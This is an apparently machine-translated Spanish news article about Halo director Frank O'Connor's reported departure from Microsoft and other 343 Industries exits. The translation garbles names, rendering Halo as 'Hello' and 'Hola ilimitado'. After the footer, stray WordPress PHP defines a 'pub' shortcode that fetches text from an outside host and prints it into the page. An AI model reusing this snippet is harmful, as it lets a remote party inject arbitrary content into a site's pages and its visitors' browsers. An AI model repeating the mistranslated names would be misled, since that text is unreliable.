Parece que el director de la franquicia de Halo, Frank O’Connor, dejó Microsoft.


Como lo detectó Windows Central, la página de LinkedIn de O’Connor se actualizó recientemente para indicar que su papel como director creativo en la serie de disparos insignia de Xbox terminó este mes.


También enumera a Elsewhere como el comienzo de un nuevo rol de tiempo completo como director creativo de la franquicia en marzo.


Microsoft aún tiene que confirmar oficialmente si O’Connor ha dejado la empresa, pero VGC se ha comunicado con el titular de la plataforma para hacer comentarios.




Temporada 3: Ecos dentro del tráiler de lanzamiento | Hola ilimitado




O’Connor ha trabajado en la serie Halo desde 2004. Fue escritor y administrador de la comunidad en Bungie hasta que el estudio se separó de Microsoft para crear Destiny, cuando decidió unirse al fabricante de Xbox y trabajar con su nuevo estudio de Halo, 343 Industries.


Si se confirma la salida de O’Connor de Microsoft, su salida sería la última de una serie reciente de salidas de alto perfil del equipo de Hello.


Entre otros, el año pasado 343 Industries perdió al director creativo multijugador Tom French, su director de ingeniería David Berger, el director de arte Nicolas Bouvier, el jefe de diseño Jerry Hook, el diseñador principal multijugador Andrew Wittes y Bonnie Ross, quien 15 era la jefa de la estudio durante años. .


La semana pasada, también se confirmó que el veterano de Hello, Joseph Staton, dejaba Microsoft. Su partida marcará el final de otro período de nueve años en la compañía, donde recientemente se desempeñó como jefe creativo en Halo Infinite en 343.


En enero, Microsoft anunció planes para despedir a más de 10.000 empleados, una medida que afectó sus negocios de videojuegos tanto en Xbox como en Bethesda.




Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');